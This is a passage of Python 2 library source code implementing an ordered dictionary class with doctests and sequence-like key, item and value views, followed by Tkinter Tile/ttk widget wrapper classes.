d[:1] = OrderedDict([(9, 8)]) >>> d OrderedDict([(9, 8), (1, 2), (2, 3), (3, 4)]) """ if isinstance(key, types.SliceType): if 
not isinstance(val, OrderedDict): # FIXME: allow a list of tuples? raise TypeError('slice assignment requires an OrderedDict') keys = self._sequence[key] # NOTE: Could use ``range(*key.indices(len(self._sequence)))`` indexes = range(len(self._sequence))[key] if key.step is None: # NOTE: new slice may not be the same size as the one being # overwritten ! # NOTE: What is the algorithm for an impossible slice? # e.g. d[5:3] pos = key.start or 0 del self[key] newkeys = val.keys() for k in newkeys: if k in self: if self.strict: raise ValueError('slice assignment must be from ' 'unique keys') else: # NOTE: This removes duplicate keys *first* # so start position might have changed? del self[k] self._sequence = (self._sequence[:pos] + newkeys + self._sequence[pos:]) dict.update(self, val) else: # extended slice - length of new slice must be the same # as the one being replaced if len(keys) != len(val): raise ValueError('attempt to assign sequence of size %s ' 'to extended slice of size %s' % (len(val), len(keys))) # FIXME: efficiency? del self[key] item_list = zip(indexes, val.items()) # smallest indexes first - higher indexes not guaranteed to # exist item_list.sort() for pos, (newkey, newval) in item_list: if self.strict and newkey in self: raise ValueError('slice assignment must be from unique' ' keys') self.insert(pos, newkey, newval) else: if key not in self: self._sequence.append(key) dict.__setitem__(self, key, val) def __getitem__(self, key): """ Allows slicing. Returns an OrderedDict if you slice. >>> b = OrderedDict([(7, 0), (6, 1), (5, 2), (4, 3), (3, 4), (2, 5), (1, 6)]) >>> b[::-1] OrderedDict([(1, 6), (2, 5), (3, 4), (4, 3), (5, 2), (6, 1), (7, 0)]) >>> b[2:5] OrderedDict([(5, 2), (4, 3), (3, 4)]) >>> type(b[2:4]) <class '__main__.OrderedDict'> """ if isinstance(key, types.SliceType): # FIXME: does this raise the error we want? keys = self._sequence[key] # FIXME: efficiency? return OrderedDict([(entry, self[entry]) for entry in keys]) else: return dict.__getitem__(self, key) __str__ = __repr__ def __setattr__(self, name, value): """ Implemented so that accesses to ``sequence`` raise a warning and are diverted to the new ``setkeys`` method. """ if name == 'sequence': warnings.warn('Use of the sequence attribute is deprecated.' ' Use the keys method instead.', DeprecationWarning) # NOTE: doesn't return anything self.setkeys(value) else: # FIXME: do we want to allow arbitrary setting of attributes? # Or do we want to manage it? object.__setattr__(self, name, value) def __getattr__(self, name): """ Implemented so that access to ``sequence`` raises a warning. >>> d = OrderedDict() >>> d.sequence [] """ if name == 'sequence': warnings.warn('Use of the sequence attribute is deprecated.' ' Use the keys method instead.', DeprecationWarning) # NOTE: Still (currently) returns a direct reference. Need to # because code that uses sequence will expect to be able to # mutate it in place. return self._sequence else: # raise the appropriate error raise AttributeError("OrderedDict has no '%s' attribute" % name) def __deepcopy__(self, memo): """ To allow deepcopy to work with OrderedDict. 
>>> from copy import deepcopy >>> a = OrderedDict([(1, 1), (2, 2), (3, 3)]) >>> a['test'] = {} >>> b = deepcopy(a) >>> b == a True >>> b is a False >>> a['test'] is b['test'] False """ from copy import deepcopy return self.__class__(deepcopy(self.items(), memo), self.strict) ### Read-only methods ### def copy(self): """ >>> OrderedDict(((1, 3), (3, 2), (2, 1))).copy() OrderedDict([(1, 3), (3, 2), (2, 1)]) """ return OrderedDict(self) def items(self): """ ``items`` returns a list of tuples representing all the ``(key, value)`` pairs in the dictionary. >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d.items() [(1, 3), (3, 2), (2, 1)] >>> d.clear() >>> d.items() [] """ return zip(self._sequence, self.values()) def keys(self): """ Return a list of keys in the ``OrderedDict``. >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d.keys() [1, 3, 2] """ return self._sequence[:] def values(self, values=None): """ Return a list of all the values in the OrderedDict. Optionally you can pass in a list of values, which will replace the current list. The value list must be the same len as the OrderedDict. >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d.values() [3, 2, 1] """ return [self[key] for key in self._sequence] def iteritems(self): """ >>> ii = OrderedDict(((1, 3), (3, 2), (2, 1))).iteritems() >>> ii.next() (1, 3) >>> ii.next() (3, 2) >>> ii.next() (2, 1) >>> ii.next() Traceback (most recent call last): StopIteration """ def make_iter(self=self): keys = self.iterkeys() while True: key = keys.next() yield (key, self[key]) return make_iter() def iterkeys(self): """ >>> ii = OrderedDict(((1, 3), (3, 2), (2, 1))).iterkeys() >>> ii.next() 1 >>> ii.next() 3 >>> ii.next() 2 >>> ii.next() Traceback (most recent call last): StopIteration """ return iter(self._sequence) __iter__ = iterkeys def itervalues(self): """ >>> iv = OrderedDict(((1, 3), (3, 2), (2, 1))).itervalues() >>> iv.next() 3 >>> iv.next() 2 >>> iv.next() 1 >>> iv.next() Traceback (most recent call last): StopIteration """ def make_iter(self=self): keys = self.iterkeys() while True: yield self[keys.next()] return make_iter() ### Read-write methods ### def clear(self): """ >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d.clear() >>> d OrderedDict([]) """ dict.clear(self) self._sequence = [] def pop(self, key, *args): """ No dict.pop in Python 2.2, gotta reimplement it >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d.pop(3) 2 >>> d OrderedDict([(1, 3), (2, 1)]) >>> d.pop(4) Traceback (most recent call last): KeyError: 4 >>> d.pop(4, 0) 0 >>> d.pop(4, 0, 1) Traceback (most recent call last): TypeError: pop expected at most 2 arguments, got 3 """ if len(args) > 1: raise TypeError, ('pop expected at most 2 arguments, got %s' % (len(args) + 1)) if key in self: val = self[key] del self[key] else: try: val = args[0] except IndexError: raise KeyError(key) return val def popitem(self, i=-1): """ Delete and return an item specified by index, not a random one as in dict. The index is -1 by default (the last item). 
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d.popitem() (2, 1) >>> d OrderedDict([(1, 3), (3, 2)]) >>> d.popitem(0) (1, 3) >>> OrderedDict().popitem() Traceback (most recent call last): KeyError: 'popitem(): dictionary is empty' >>> d.popitem(2) Traceback (most recent call last): IndexError: popitem(): index 2 not valid """ if not self._sequence: raise KeyError('popitem(): dictionary is empty') try: key = self._sequence[i] except IndexError: raise IndexError('popitem(): index %s not valid' % i) return (key, self.pop(key)) def setdefault(self, key, defval = None): """ >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d.setdefault(1) 3 >>> d.setdefault(4) is None True >>> d OrderedDict([(1, 3), (3, 2), (2, 1), (4, None)]) >>> d.setdefault(5, 0) 0 >>> d OrderedDict([(1, 3), (3, 2), (2, 1), (4, None), (5, 0)]) """ if key in self: return self[key] else: self[key] = defval return defval def update(self, from_od): """ Update from another OrderedDict or sequence of (key, value) pairs >>> d = OrderedDict(((1, 0), (0, 1))) >>> d.update(OrderedDict(((1, 3), (3, 2), (2, 1)))) >>> d OrderedDict([(1, 3), (0, 1), (3, 2), (2, 1)]) >>> d.update({4: 4}) Traceback (most recent call last): TypeError: undefined order, cannot get items from dict >>> d.update((4, 4)) Traceback (most recent call last): TypeError: cannot convert dictionary update sequence element "4" to a 2-item sequence """ if isinstance(from_od, OrderedDict): for key, val in from_od.items(): self[key] = val elif isinstance(from_od, dict): # we lose compatibility with other ordered dict types this way raise TypeError('undefined order, cannot get items from dict') else: # FIXME: efficiency? # sequence of 2-item sequences, or error for item in from_od: try: key, val = item except TypeError: raise TypeError('cannot convert dictionary update' ' sequence element "%s" to a 2-item sequence' % item) self[key] = val def rename(self, old_key, new_key): """ Rename the key for a given value, without modifying sequence order. For the case where new_key already exists this raise an exception, since if new_key exists, it is ambiguous as to what happens to the associated values, and the position of new_key in the sequence. >>> od = OrderedDict() >>> od['a'] = 1 >>> od['b'] = 2 >>> od.items() [('a', 1), ('b', 2)] >>> od.rename('b', 'c') >>> od.items() [('a', 1), ('c', 2)] >>> od.rename('c', 'a') Traceback (most recent call last): ValueError: New key already exists: 'a' >>> od.rename('d', 'b') Traceback (most recent call last): KeyError: 'd' """ if new_key == old_key: # no-op return if new_key in self: raise ValueError("New key already exists: %r" % new_key) # rename sequence entry value = self[old_key] old_idx = self._sequence.index(old_key) self._sequence[old_idx] = new_key # rename internal dict entry dict.__delitem__(self, old_key) dict.__setitem__(self, new_key, value) def setitems(self, items): """ This method allows you to set the items in the dict. It takes a list of tuples - of the same sort returned by the ``items`` method. >>> d = OrderedDict() >>> d.setitems(((3, 1), (2, 3), (1, 2))) >>> d OrderedDict([(3, 1), (2, 3), (1, 2)]) """ self.clear() # FIXME: this allows you to pass in an OrderedDict as well :-) self.update(items) def setkeys(self, keys): """ ``setkeys`` all ows you to pass in a new list of keys which will replace the current set. This must contain the same set of keys, but need not be in the same order. If you pass in new keys that don't match, a ``KeyError`` will be raised. 
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d.keys() [1, 3, 2] >>> d.setkeys((1, 2, 3)) >>> d OrderedDict([(1, 3), (2, 1), (3, 2)]) >>> d.setkeys(['a', 'b', 'c']) Traceback (most recent call last): KeyError: 'Keylist is not the same as current keylist.' """ # FIXME: Efficiency? (use set for Python 2.4 :-) # NOTE: list(keys) rather than keys[:] because keys[:] returns # a tuple, if keys is a tuple. kcopy = list(keys) kcopy.sort() self._sequence.sort() if kcopy != self._sequence: raise KeyError('Keylist is not the same as current keylist.') # NOTE: This makes the _sequence attribute a new object, instead # of changing it in place. # FIXME: efficiency? self._sequence = list(keys) def setvalues(self, values): """ You can pass in a list of values, which will replace the current list. The value list must be the same len as the OrderedDict. (Or a ``ValueError`` is raised.) >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d.setvalues((1, 2, 3)) >>> d OrderedDict([(1, 1), (3, 2), (2, 3)]) >>> d.setvalues([6]) Traceback (most recent call last): ValueError: Value list is not the same length as the OrderedDict. """ if len(values) != len(self): # FIXME: correct error to raise? raise ValueError('Value list is not the same length as the ' 'OrderedDict.') self.update(zip(self, values)) ### Sequence Methods ### def index(self, key): """ Return the position of the specified key in the OrderedDict. >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d.index(3) 1 >>> d.index(4) Traceback (most recent call last): ValueError: list.index(x): x not in list """ return self._sequence.index(key) def insert(self, index, key, value): """ Takes ``index``, ``key``, and ``value`` as arguments. Sets ``key`` to ``value``, so that ``key`` is at position ``index`` in the OrderedDict. >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d.insert(0, 4, 0) >>> d OrderedDict([(4, 0), (1, 3), (3, 2), (2, 1)]) >>> d.insert(0, 2, 1) >>> d OrderedDict([(2, 1), (4, 0), (1, 3), (3, 2)]) >>> d.insert(8, 8, 1) >>> d OrderedDict([(2, 1), (4, 0), (1, 3), (3, 2), (8, 1)]) """ if key in self: # FIXME: efficiency? del self[key] self._sequence.insert(index, key) dict.__setitem__(self, key, value) def reverse(self): """ Reverse the order of the OrderedDict. >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d.reverse() >>> d OrderedDict([(2, 1), (3, 2), (1, 3)]) """ self._sequence.reverse() def sort(self, *args, **kwargs): """ Sort the key order in the OrderedDict. This method takes the same arguments as the ``list.sort`` method on your version of Python. >>> d = OrderedDict(((4, 1), (2, 2), (3, 3), (1, 4))) >>> d.sort() >>> d OrderedDict([(1, 4), (2, 2), (3, 3), (4, 1)]) """ self._sequence.sort(*args, **kwargs) class Keys(object): # FIXME: should this object be a subclass of list? """ Custom object for accessing the keys of an OrderedDict. Can be called like the normal ``OrderedDict.keys`` method, but also supports indexing and sequence methods. """ def __init__(self, main): self._main = main def __call__(self): """Pretend to be the keys method.""" return self._main._keys() def __getitem__(self, index): """Fetch the key at position i.""" # NOTE: this automatically supports slicing :-) return self._main._sequence[index] def __setitem__(self, index, name): """ You cannot assign to keys, but you can do slice assignment to re-order them. You can only do slice assignment if the new set of keys is a reordering of the original set. """ if isinstance(index, types.SliceType): # FIXME: efficiency? 
# check length is the same indexes = range(len(self._main._sequence))[index] if len(indexes) != len(name): raise ValueError('attempt to assign sequence of size %s ' 'to slice of size %s' % (len(name), len(indexes))) # check they are the same keys # FIXME: Use set old_keys = self._main._sequence[index] new_keys = list(name) old_keys.sort() new_keys.sort() if old_keys != new_keys: raise KeyError('Keylist is not the same as current keylist.') orig_vals = [self._main[k] for k in name] del self._main[index] vals = zip(indexes, name, orig_vals) vals.sort() for i, k, v in vals: if self._main.strict and k in self._main: raise ValueError('slice assignment must be from ' 'unique keys') self._main.insert(i, k, v) else: raise ValueError('Cannot assign to keys') ### following methods pinched from UserList and adapted ### def __repr__(self): return repr(self._main._sequence) # FIXME: do we need to check if we are comparing with another ``Keys`` # object? (like the __cast method of UserList) def __lt__(self, other): return self._main._sequence < other def __le__(self, other): return self._main._sequence <= other def __eq__(self, other): return self._main._sequence == other def __ne__(self, other): return self._main._sequence != other def __gt__(self, other): return self._main._sequence > other def __ge__(self, other): return self._main._sequence >= other # FIXME: do we need __cmp__ as well as rich comparisons? def __cmp__(self, other): return cmp(self._main._sequence, other) def __contains__(self, item): return item in self._main._sequence def __len__(self): return len(self._main._sequence) def __iter__(self): return self._main.iterkeys() def count(self, item): return self._main._sequence.count(item) def index(self, item, *args): return self._main._sequence.index(item, *args) def reverse(self): self._main._sequence.reverse() def sort(self, *args, **kwds): self._main._sequence.sort(*args, **kwds) def __mul__(self, n): return self._main._sequence*n __rmul__ = __mul__ def __add__(self, other): return self._main._sequence + other def __radd__(self, other): return other + self._main._sequence ## following methods not implemented for keys ## def __delitem__(self, i): raise TypeError('Can\'t delete items from keys') def __iadd__(self, other): raise TypeError('Can\'t add in place to keys') def __imul__(self, n): raise TypeError('Can\'t multiply keys in place') def append(self, item): raise TypeError('Can\'t append items to keys') def insert(self, i, item): raise TypeError('Can\'t insert items into keys') def pop(self, i=-1): raise TypeError('Can\'t pop items from keys') def remove(self, item): raise TypeError('Can\'t remove items from keys') def extend(self, other): raise TypeError('Can\'t extend keys') class Items(object): """ Custom object for accessing the items of an OrderedDict. Can be called like the normal ``OrderedDict.items`` method, but also supports indexing and sequence methods. """ def __init__(self, main): self._main = main def __call__(self): """Pretend to be the items method.""" return self._main._items() def __getitem__(self, index): """Fetch the item at position i.""" if isinstance(index, types.SliceType): # fetching a slice returns an OrderedDict return self._main[index].items() key = self._main._sequence[index] return (key, self._main[key]) def __setitem__(self, index, item): """Set item at position i to item.""" if isinstance(index, types.SliceType): # NOTE: item must be an iterable (list of tuples) self._main[index] = OrderedDict(item) else: # FIXME: Does this raise a sensible error? 
orig = self._main.keys[index] key, value = item if self._main.strict and key in self and (key != orig): raise ValueError('slice assignment must be from ' 'unique keys') # delete the current one del self._main[self._main._sequence[index]] self._main.insert(index, key, value) def __delitem__(self, i): """Delete the item at position i.""" key = self._main._sequence[i] if isinstance(i, types.SliceType): for k in key: # FIXME: efficiency? del self._main[k] else: del self._main[key] ### following methods pinched from UserList and adapted ### def __repr__(self): return repr(self._main.items()) # FIXME: do we need to check if we are comparing with another ``Items`` # object? (like the __cast method of UserList) def __lt__(self, other): return self._main.items() < other def __le__(self, other): return self._main.items() <= other def __eq__(self, other): return self._main.items() == other def __ne__(self, other): return self._main.items() != other def __gt__(self, other): return self._main.items() > other def __ge__(self, other): return self._main.items() >= other def __cmp__(self, other): return cmp(self._main.items(), other) def __contains__(self, item): return item in self._main.items() def __len__(self): return len(self._main._sequence) # easier :-) def __iter__(self): return self._main.iteritems() def count(self, item): return self._main.items().count(item) def index(self, item, *args): return self._main.items().index(item, *args) def reverse(self): self._main.reverse() def sort(self, *args, **kwds): self._main.sort(*args, **kwds) def __mul__(self, n): return self._main.items()*n __rmul__ = __mul__ def __add__(self, other): return self._main.items() + other def __radd__(self, other): return other + self._main.items() def append(self, item): """Add an item to the end.""" # FIXME: this is only append if the key isn't already present key, value = item self._main[key] = value def insert(self, i, item): key, value = item self._main.insert(i, key, value) def pop(self, i=-1): key = self._main._sequence[i] return (key, self._main.pop(key)) def remove(self, item): key, value = item try: assert value == self._main[key] except (KeyError, AssertionError): raise ValueError('ValueError: list.remove(x): x not in list') else: del self._main[key] def extend(self, other): # FIXME: is only a true extend if none of the keys already present for item in other: key, value = item self._main[key] = value def __iadd__(self, other): self.extend(other) ## following methods not implemented for items ## def __imul__(self, n): raise TypeError('Can\'t multiply items in place') class Values(object): """ Custom object for accessing the values of an OrderedDict. Can be called like the normal ``OrderedDict.values`` method, but also supports indexing and sequence methods. """ def __init__(self, main): self._main = main def __call__(self): """Pretend to be the values method.""" return self._main._values() def __getitem__(self, index): """Fetch the value at position i.""" if isinstance(index, types.SliceType): return [self._main[key] for key in self._main._sequence[index]] else: return self._main[self._main._sequence[index]] def __setitem__(self, index, value): """ Set the value at position i to value. You can only do slice assignment to values if you supply a sequence of equal length to the slice you are replacing. 
""" if isinstance(index, types.SliceType): keys = self._main._sequence[index] if len(keys) != len(value): raise ValueError('attempt to assign sequence of size %s ' 'to slice of size %s' % (len(name), len(keys))) # FIXME: efficiency? Would be better to calculate the indexes # directly from the slice object # NOTE: the new keys can collide with existing keys (or even # contain duplicates) - these will overwrite for key, val in zip(keys, value): self._main[key] = val else: self._main[self._main._sequence[index]] = value ### following methods pinched from UserList and adapted ### def __repr__(self): return repr(self._main.values()) # FIXME: do we need to check if we are comparing with another ``Values`` # object? (like the __cast method of UserList) def __lt__(self, other): return self._main.values() < other def __le__(self, other): return self._main.values() <= other def __eq__(self, other): return self._main.values() == other def __ne__(self, other): return self._main.values() != other def __gt__(self, other): return self._main.values() > other def __ge__(self, other): return self._main.values() >= other def __cmp__(self, other): return cmp(self._main.values(), other) def __contains__(self, item): return item in self._main.values() def __len__(self): return len(self._main._sequence) # easier :-) def __iter__(self): return self._main.itervalues() def count(self, item): return self._main.values().count(item) def index(self, item, *args): return self._main.values().index(item, *args) def reverse(self): """Reverse the values""" vals = self._main.values() vals.reverse() # FIXME: efficiency self[:] = vals def sort(self, *args, **kwds): """Sort the values.""" vals = self._main.values() vals.sort(*args, **kwds) self[:] = vals def __mul__(self, n): return self._main.values()*n __rmul__ = __mul__ def __add__(self, other): return self._main.values() + other def __radd__(self, other): return other + self._main.values() ## following methods not implemented for values ## def __delitem__(self, i): raise TypeError('Can\'t delete items from values') def __iadd__(self, other): raise TypeError('Can\'t add in place to values') def __imul__(self, n): raise TypeError('Can\'t multiply values in place') def append(self, item): raise TypeError('Can\'t append items to values') def insert(self, i, item): raise TypeError('Can\'t insert items into values') def pop(self, i=-1): raise TypeError('Can\'t pop items from values') def remove(self, item): raise TypeError('Can\'t remove items from values') def extend(self, other): raise TypeError('Can\'t extend values') class SequenceOrderedDict(OrderedDict): """ Experimental version of OrderedDict that has a custom object for ``keys``, ``values``, and ``items``. These are callable sequence objects that work as methods, or can be manipulated directly as sequences. Test for ``keys``, ``items`` and ``values``. 
>>> d = SequenceOrderedDict(((1, 2), (2, 3), (3, 4))) >>> d SequenceOrderedDict([(1, 2), (2, 3), (3, 4)]) >>> d.keys [1, 2, 3] >>> d.keys() [1, 2, 3] >>> d.setkeys((3, 2, 1)) >>> d SequenceOrderedDict([(3, 4), (2, 3), (1, 2)]) >>> d.setkeys((1, 2, 3)) >>> d.keys[0] 1 >>> d.keys[:] [1, 2, 3] >>> d.keys[-1] 3 >>> d.keys[-2] 2 >>> d.keys[0:2] = [2, 1] >>> d SequenceOrderedDict([(2, 3), (1, 2), (3, 4)]) >>> d.keys.reverse() >>> d.keys [3, 1, 2] >>> d.keys = [1, 2, 3] >>> d SequenceOrderedDict([(1, 2), (2, 3), (3, 4)]) >>> d.keys = [3, 1, 2] >>> d SequenceOrderedDict([(3, 4), (1, 2), (2, 3)]) >>> a = SequenceOrderedDict() >>> b = SequenceOrderedDict() >>> a.keys == b.keys 1 >>> a['a'] = 3 >>> a.keys == b.keys 0 >>> b['a'] = 3 >>> a.keys == b.keys 1 >>> b['b'] = 3 >>> a.keys == b.keys 0 >>> a.keys > b.keys 0 >>> a.keys < b.keys 1 >>> 'a' in a.keys 1 >>> len(b.keys) 2 >>> 'c' in d.keys 0 >>> 1 in d.keys 1 >>> [v for v in d.keys] [3, 1, 2] >>> d.keys.sort() >>> d.keys [1, 2, 3] >>> d = SequenceOrderedDict(((1, 2), (2, 3), (3, 4)), strict=True) >>> d.keys[::-1] = [1, 2, 3] >>> d SequenceOrderedDict([(3, 4), (2, 3), (1, 2)]) >>> d.keys[:2] [3, 2] >>> d.keys[:2] = [1, 3] Traceback (most recent call last): KeyError: 'Keylist is not the same as current keylist.' >>> d = SequenceOrderedDict(((1, 2), (2, 3), (3, 4))) >>> d SequenceOrderedDict([(1, 2), (2, 3), (3, 4)]) >>> d.values [2, 3, 4] >>> d.values() [2, 3, 4] >>> d.setvalues((4, 3, 2)) >>> d SequenceOrderedDict([(1, 4), (2, 3), (3, 2)]) >>> d.values[::-1] [2, 3, 4] >>> d.values[0] 4 >>> d.values[-2] 3 >>> del d.values[0] Traceback (most recent call last): TypeError: Can't delete items from values >>> d.values[::2] = [2, 4] >>> d SequenceOrderedDict([(1, 2), (2, 3), (3, 4)]) >>> 7 in d.values 0 >>> len(d.values) 3 >>> [val for val in d.values] [2, 3, 4] >>> d.values[-1] = 2 >>> d.values.count(2) 2 >>> d.values.index(2) 0 >>> d.values[-1] = 7 >>> d.values [2, 3, 7] >>> d.values.reverse() >>> d.values [7, 3, 2] >>> d.values.sort() >>> d.values [2, 3, 7] >>> d.values.append('anything') Traceback (most recent call last): TypeError: Can't append items to values >>> d.values = (1, 2, 3) >>> d SequenceOrderedDict([(1, 1), (2, 2), (3, 3)]) >>> d = SequenceOrderedDict(((1, 2), (2, 3), (3, 4))) >>> d SequenceOrderedDict([(1, 2), (2, 3), (3, 4)]) >>> d.items() [(1, 2), (2, 3), (3, 4)] >>> d.setitems([(3, 4), (2 ,3), (1, 2)]) >>> d SequenceOrderedDict([(3, 4), (2, 3), (1, 2)]) >>> d.items[0] (3, 4) >>> d.items[:-1] [(3, 4), (2, 3)] >>> d.items[1] = (6, 3) >>> d.items [(3, 4), (6, 3), (1, 2)] >>> d.items[1:2] = [(9, 9)] >>> d SequenceOrderedDict([(3, 4), (9, 9), (1, 2)]) >>> del d.items[1:2] >>> d SequenceOrderedDict([(3, 4), (1, 2)]) >>> (3, 4) in d.items 1 >>> (4, 3) in d.items 0 >>> len(d.items) 2 >>> [v for v in d.items] [(3, 4), (1, 2)] >>> d.items.count((3, 4)) 1 >>> d.items.index((1, 2)) 1 >>> d.items.index((2, 1)) Traceback (most recent call last): ValueError: list.index(x): x not in list >>> d.items.reverse() >>> d.items [(1, 2), (3, 4)] >>> d.items.reverse() >>> d.items.sort() >>> d.items [(1, 2), (3, 4)] >>> d.items.append((5, 6)) >>> d.items [(1, 2), (3, 4), (5, 6)] >>> d.items.insert(0, (0, 0)) >>> d.items [(0, 0), (1, 2), (3, 4), (5, 6)] >>> d.items.insert(-1, (7, 8)) >>> d.items [(0, 0), (1, 2), (3, 4), (7, 8), (5, 6)] >>> d.items.pop() (5, 6) >>> d.items [(0, 0), (1, 2), (3, 4), (7, 8)] >>> d.items.remove((1, 2)) >>> d.items [(0, 0), (3, 4), (7, 8)] >>> d.items.extend([(1, 2), (5, 6)]) >>> d.items [(0, 0), (3, 4), (7, 8), (1, 2), (5, 6)] """ def 
__init__(self, init_val=(), strict=True): OrderedDict.__init__(self, init_val, strict=strict) self._keys = self.keys self._values = self.values self._items = self.items self.keys = Keys(self) self.values = Values(self) self.items = Items(self) self._att_dict = { 'keys': self.setkeys, 'items': self.setitems, 'values': self.setvalues, } def __setattr__(self, name, value): """Protect keys, items, and values.""" if not '_att_dict' in self.__dict__: object.__setattr__(self, name, value) else: try: fun = self._att_dict[name] except KeyError: OrderedDict.__setattr__(self, name, value) else: fun(value) # Tile wrapping copied from http://tkinter.unpythonic.net/wiki/TileWrapper. # Will be able to replace with ttk from Python 2.7, eventually. # only create these gui classes if Tkinter is available (so param does # not depend on Tkinter). try: import Tkinter from Tkconstants import * # CB: should get the specific imports and move to section below Tkinter_imported = True except ImportError: Tkinter_imported = False if Tkinter_imported: if Tkinter.TkVersion >= 8.5: class Style: def default(self, style, **kw): """Sets the default value of the specified option(s) in style""" pass def map_style(self, **kw): """Sets dynamic values of the specified option(s) in style. See "STATE MAPS", below.""" pass def layout(self, style, layoutSpec): """Define the widget layout for style style. See "LAYOUTS" below for the format of layoutSpec. If layoutSpec is omitted, return the layout specification for style style. """ pass def element_create(self, name, type, *args): """Creates a new element in the current theme of type type. The only built-in element type is image (see image(n)), although themes may define other element types (see Ttk_RegisterElementFactory). """ pass def element_names(self): """Returns a list of all elements defined in the current theme. """ pass def theme_create(self, name, parent=None, basedon=None): """Creates a new theme. It is an error if themeName already exists. If -parent is specified, the new theme will inherit styles, elements, and layouts from the parent theme basedon. If -settings is present, script is evaluated in the context of the new theme as per style theme settings. """ pass def theme_settings(self, name, script): """Temporarily sets the current theme to themeName, evaluate script, then restore the previous theme. Typically script simply defines styles and elements, though arbitrary Tcl code may appear. """ pass def theme_names(self): """Returns a list of the available themes. """ return self.tk.call("style", "theme", "names") def theme_use(self, theme): """Sets the current theme to themeName, and refreshes all widgets.""" return self.tk.call("style", "theme", "use", theme) class Widget(Tkinter.Widget, Style): def __init__(self, master, widgetName=None, cnf={}, kw={}, extra=()): if not widgetName: ## why you would ever want to create a Tile Widget is behond me! widgetName="ttk::widget" Tkinter.Widget.__init__(self, master, widgetName, cnf, kw) def instate(self, spec=None, script=None): """Test the widget's state. If script is not specified, returns 1 if the widget state matches statespec and 0 otherwise. If script is specified, equivalent to if {[pathName instate stateSpec]} script. """ return self.tk.call(self._w, "instate", spec, script) def state(self, spec=None): """Modify or inquire widget state. If stateSpec is present, sets the widget state: for each flag in stateSpec, sets the corresponding flag or clears it if prefixed by an exclamation point. 
Returns a new state spec indicating which flags were changed: ''set changes [pathName state spec] ; pathName state $changes'' will restore pathName to the original state. If stateSpec is not specified, returns a list of the currently-enabled state flags. """ return self.tk.call(self._w, "state", spec) class Button(Widget, Tkinter.Button): def __init__(self, master=None, cnf={}, **kw): Widget.__init__(self, master, "ttk::button", cnf, kw) ###add frame support here--KWs class Frame(Widget, Tkinter.Frame): def __init__(self, master=None, cnf={}, **kw): Widget.__init__(self, master, "ttk::frame", cnf, kw) class Checkbutton(Widget, Tkinter.Checkbutton): def __init__(self, master=None, cnf={}, **kw): Widget.__init__(self, master, "ttk::checkbutton", cnf, kw) class Combobox(Widget, Tkinter.Entry): def __init__(self, master=None, cnf={}, **kw): # HACK to work around strange parsing of list if 'values' in kw: values = kw['values'] if isinstance(values,list): kw['values'] = tuple(values) Widget.__init__(self, master, "ttk::combobox", cnf, kw) def current(self, index=None): """If index is supplied, sets the combobox value to the element at position newIndex in the list of -values. Otherwise, returns the index of the current value in the list of -values or -1 if the current value does not appear in the list. """ return self.tk.call(self._w, "current", index) class Entry(Widget, Tkinter.Entry): def __init__(self, master=None, cnf={}, **kw): Widget.__init__(self, master, "ttk::entry", cnf, kw) def validate(self): """Force revalidation, independent of the conditions specified by the -validate option. Returns 0 if the -validatecommand returns a false value, or 1 if it returns a true value or is not specified. """ return self.tk.call(self._w, "validate") class Label(Widget, Tkinter.Label): def __init__(self, master=None, cnf={}, **kw): Widget.__init__(self, master, "ttk::label", cnf, kw) ###add LabelFrame class here--KW class LabelFrame(Widget, Tkinter.Label): def __init__(self, master=None, cnf={}, **kw): Widget.__init__(self, master, "ttk::labelframe", cnf, kw) class Menubutton(Widget, Tkinter.Menubutton): def __init__(self, master=None, cnf={}, **kw): Widget.__init__(self, master, "ttk::menubutton", cnf, kw) class Notebook(Widget): def __init__(self, master=None, cnf={}, **kw): Widget.__init__(self, master, "ttk::notebook", cnf, kw) def add(self, child, cnf=(), **kw): """Adds a new tab to the notebook. When the tab is selected, the child window will be displayed. child must be a direct child of the notebook window. See TAB OPTIONS for the list of available options. """ return self.tk.call((self._w, "add", child) + self._options(cnf, kw)) def forget(self, index): """Removes the tab specified by index, unmaps and unmanages the associated child window. """ return self.tk.call(self._w, "forget", index) def index(self, index): """Returns the numeric index of the tab specified by index, or the total number of tabs if index is the string "end". """ return self.tk.call(self._w, "index") def select(self, index): """Selects the specified tab; the associated child pane will be displayed, and the previously-selected pane (if different) is unmapped. """ return self.tk.call(self._w, "select", index) def tab(self, index, **kw): """Query or modify the options of the specific tab. If no -option is specified, returns a dictionary of the tab option values. If one -option is specified, returns the value of tha t option. Otherwise, sets the -options to the corresponding values. See TAB OPTIONS for the available options. 
""" return self.tk.call((self._w, "tab", index) + self._options(kw)) def tabs(self): """Returns a list of all pane windows managed by the widget.""" return self.tk.call(self._w, "tabs") class Paned(Widget): """ WIDGET OPTIONS Name Database name Database class -orient orient Orient Specifies the orientation of the window. If vertical, subpanes are stacked top-to-bottom; if horizontal, subpanes are stacked left-to-right. PANE OPTIONS The following options may be specified for each pane: Name Database name Database class -weight weight Weight An integer specifying the relative stretchability of the pane. When the paned window is resized, the extra space is added or subracted to each pane proportionally to its -weight """ def __init__(self, master=None, cnf={}, **kw): Widget.__init__(self, master, "ttk::panedwindow", cnf, kw) def add(self, subwindow, **kw): """Adds a new pane to the window. subwindow must be a direct child of the paned window pathname. See PANE OPTIONS for the list of available options. """ return self.tk.call((self._w, "add", subwindow) + self._options(kw)) def forget(self, pane): """Removes the specified subpane from the widget. pane is either an integer index or the name of a managed subwindow. """ self.tk.call(self._w, "forget", pane) def insert(self, pos, subwindow, **kw): """Inserts a pane at the specified position. pos is either the string end, an integer index, or the name of a managed subwindow. If subwindow is already managed by the paned window, moves it to the specified position. See PANE OPTIONS for the list of available options. """ return self.tk.call((self._w, "insert", pos, subwindow) + self._options(kw)) def pane(self, pane, **kw): """Query or modify the options of the specified pane, where pane is either an integer index or the name of a managed subwindow. If no -option is specified, returns a dictionary of the pane option values. If one -option is specified, returns the value of that option. Otherwise, sets the -options to the corresponding values. """ return 